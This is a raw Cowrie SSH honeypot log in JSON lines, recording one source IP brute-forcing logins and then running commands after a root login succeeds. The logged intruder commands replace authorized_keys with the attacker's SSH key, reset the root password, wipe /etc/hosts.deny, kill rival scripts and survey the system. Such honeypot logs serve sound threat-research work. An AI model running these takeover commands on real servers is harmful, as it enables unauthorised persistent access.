{"eventid":"cowrie.login.success","username":"root","password":"Abc@123","message":"login attempt [root/Abc@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:47:47.988968Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:47:48.518795Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:47:48.519648Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:47:48.520759Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:47:48.757003Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:47:49.245243Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:47:49.245978Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:47:49.483234Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:47:49.484086Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60644,"dst_ip":"1.2.3.4","dst_port":22,"session":"360f5b76d942","protocol":"ssh","message":"New connection: 212.227.235.229:60644 (1.2.3.4:22) [session: 360f5b76d942]","sensor":"my-vps","timestamp":"2025-08-26T18:47:49.717347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:47:49.718074Z","src_ip":"212.227.235.229","session":"360f5b76d942"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:47:49.953511Z","src_ip":"212.227.235.229","session":"360f5b76d942"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:47:50.933669Z","src_ip":"212.227.235.229","session":"360f5b76d942"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:47:52.171211Z","src_ip":"212.227.235.229","session":"360f5b76d942"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:47:58.473085Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:47:58.473833Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:47:58.711447Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:47:59.203739Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"echo \"root:guS0vL6WFsci\"|chpasswd|bash","message":"CMD: echo \"root:guS0vL6WFsci\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T18:47:59.204468Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c3138b628524b24977ebf20fad8c7e58cd97b7edebb5f04eea41f9d7b546da77","size":21,"shasum":"c3138b628524b24977ebf20fad8c7e58cd97b7edebb5f04eea41f9d7b546da77","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c3138b628524b24977ebf20fad8c7e58cd97b7edebb5f04eea41f9d7b546da77 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:47:59.441189Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:47:59.964750Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T18:47:59.965466Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T18:48:00.204112Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:00.205055Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:00.733729Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T18:48:00.734554Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:00.971772Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:01.471694Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T18:48:01.472599Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:01.709687Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:02.290132Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T18:48:02.290881Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T18:48:02.291585Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:02.529512Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:03.027465Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T18:48:03.028429Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:03.265421Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:03.845145Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T18:48:03.845849Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:04.082568Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:04.611491Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T18:48:04.612170Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:04.848263Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:05.338496Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:48:05.339278Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:05.576288Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:06.150131Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T18:48:06.150914Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:06.387699Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:06.926435Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T18:48:06.927269Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:07.164063Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:07.655059Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T18:48:07.655862Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:07.892525Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:08.465896Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T18:48:08.466813Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:08.703325Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:09.197098Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T18:48:09.198014Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:09.437112Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:48:10.001480Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T18:48:10.002098Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:10.240786Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.closed","duration":"23.4","message":"Connection lost after 23.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:10.242187Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45411,"dst_ip":"1.2.3.4","dst_port":23,"session":"43cf9219c34d","protocol":"telnet","message":"New connection: 212.227.235.229:45411 (1.2.3.4:23) [session: 43cf9219c34d]","sensor":"my-vps","timestamp":"2025-08-26T18:48:26.985476Z"}
{"eventid":"cowrie.session.closed","duration":15.046271324157715,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:42.031669Z","src_ip":"212.227.235.229","session":"43cf9219c34d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55099,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4a0916e2bf0","protocol":"ssh","message":"New connection: 212.227.235.229:55099 (1.2.3.4:22) [session: f4a0916e2bf0]","sensor":"my-vps","timestamp":"2025-08-26T18:48:56.147148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:48:56.152113Z","src_ip":"212.227.235.229","session":"f4a0916e2bf0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:48:56.402479Z","src_ip":"212.227.235.229","session":"f4a0916e2bf0"}
{"eventid":"cowrie.login.failed","username":"user","password":"123qwe","message":"login attempt [user/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T18:48:57.413196Z","src_ip":"212.227.235.229","session":"f4a0916e2bf0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:48:58.670510Z","src_ip":"212.227.235.229","session":"f4a0916e2bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50976,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ed18fd1bc95","protocol":"ssh","message":"New connection: 212.227.235.229:50976 (1.2.3.4:22) [session: 4ed18fd1bc95]","sensor":"my-vps","timestamp":"2025-08-26T18:49:52.893289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:49:52.894118Z","src_ip":"212.227.235.229","session":"4ed18fd1bc95"}
